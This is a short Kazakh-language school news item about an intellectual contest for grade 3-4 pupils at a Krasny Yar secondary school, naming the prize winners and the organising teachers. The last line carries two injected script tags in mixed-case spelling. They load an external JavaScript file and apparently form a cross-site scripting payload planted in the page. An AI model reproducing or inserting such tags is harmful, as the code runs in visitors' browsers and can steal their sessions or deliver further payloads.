«Красный Яр ауылының №1 жалпы орта білім беретін мектебінде» КММ 14 сәуір күні бастауыш сыныптың пән апталығы аясында 3-4 сынып оқушылары арасында «Тапқыр болсаң, озып көр!» атты зияткерлік сайысы өтті. Іс-шараның мақсаты: оқушылардың ой-өрісін кеңейту, ойлау қабілетін шыңдау, білімге деген құштарлығын арттыру, озық ойлы оқушыны анықтау. Іс-шара барысында оқушылар белсенді қатысып, өз білімдерін көрсетті. Оқушылар сайыста жүлделі орындарға ие болып, мақтау қағаздармен марапатталды. 1-орын иегері: 3 «Б» сыныбының оқушысы Жумабаева Амира, 2-орын иегері: 3 «Г» сыныбының оқушысы Жұмабек Айяжан, 3-орын иегері: 4 «В» сыныбының оқушысы Сапаргалиева Аружан. Ұйымдастырушылар: қазақ тілі пәнінің мұғалімдері Нурмагамбетова А.К., Байзаубай Г.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>